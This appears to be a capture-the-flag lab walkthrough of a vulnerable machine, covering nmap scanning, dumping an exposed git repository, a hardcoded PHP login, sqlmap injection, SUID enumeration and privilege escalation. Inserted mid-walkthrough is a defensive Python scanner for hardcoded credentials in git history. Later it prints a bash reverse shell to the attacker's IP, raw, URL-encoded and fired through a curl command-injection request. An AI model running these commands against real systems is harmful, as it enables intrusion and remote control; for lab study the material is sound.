Description
Difficulty: Hard
This works better with VMware rather than VirtualBox
Hint: Don’t waste your time For Brute-Force
Host discovery with nmap
```
kali 192.168.169.220
target 192.168.169.230
```
nmap scan of the target
```
Ports 22 80
Git repository (git leak)
```
Directories
Using a git tool
```
https://github.com/arthaud/git-dumper
```
```bash
python3 git_dumper.py http://192.168.169.230/.git/ website
```
Inspecting the files
git log
```php
if($_POST['email'] == "lush@admin.com" && $_POST['password'] == "321"){
```
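A credential check like the one above stays recoverable from history even after it is removed from the current files. As an added example (not part of the original write-up), this Python sketch scans `git log -p` output for added lines that compare `$_POST` fields to string literals, so a repository owner can find them before deployment; the function name, patterns and sample history are constructed for illustration.

```python
import re

# PHP comparison of a request field against a string literal,
# e.g. $_POST['password'] == "..."
CRED_CMP = re.compile(
    r"""\$_(?:POST|GET|REQUEST)\[\s*['"](?P<field>[^'"]+)['"]\s*\]"""
    r"""\s*={2,3}\s*(?P<q>['"]).*?(?P=q)"""
)
SENSITIVE = re.compile(r"pass|pwd|secret|token|email|user", re.I)


def scan_git_log(patch_text):
    """Return (commit, file, field) for hardcoded checks on added lines.

    The literal value is deliberately left out of the report.
    """
    findings, commit, path = [], None, None
    for line in patch_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1]
        elif line.startswith("+++ "):
            path = line[4:]
            if path.startswith("b/"):
                path = path[2:]
        elif line.startswith("+"):
            for m in CRED_CMP.finditer(line):
                if SENSITIVE.search(m["field"]):
                    findings.append((commit, path, m["field"]))
    return findings


# Constructed history: the newer commit removes the check, the older one added it.
SAMPLE = '''commit 1111111111111111111111111111111111111111
    use database for login
--- a/login.php
+++ b/login.php
-if($_POST['email'] == "user@example.test" && $_POST['password'] == "changeme"){
+if(check_login($_POST['email'], $_POST['password'])){
commit 2222222222222222222222222222222222222222
    add login
--- /dev/null
+++ b/login.php
+if($_POST['email'] == "user@example.test" && $_POST['password'] == "changeme"){
'''

if __name__ == "__main__":
    for commit, path, field in scan_git_log(SAMPLE):
        print(commit[:8], path, field)
```

Only the older commit is reported: the fix in the newer commit does not erase the literal from history, so the credential has to be rotated and `.git` kept out of the web root.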
Login test
Injection
```bash
sqlmap -u "http://192.168.169.230/dashboard.php?id=1" --cookie PHPSESSID=3ca3jbi4mk3749bv84uu4supol --dbs
```
ssh
```bash
ssh jehad@192.168.169.230
```
```bash
find / -user root -perm -4000 -print 2>/dev/null
```
Writing a shell
```bash
bash -c 'bash -i >& /dev/tcp/192.168.169.220/6666 0>&1'
```
```
bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'
```
```bash
curl "127.0.0.1:9999/?cmd=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.169.220%2F6666%200%3E%261'"
```
Switching user
Privilege escalation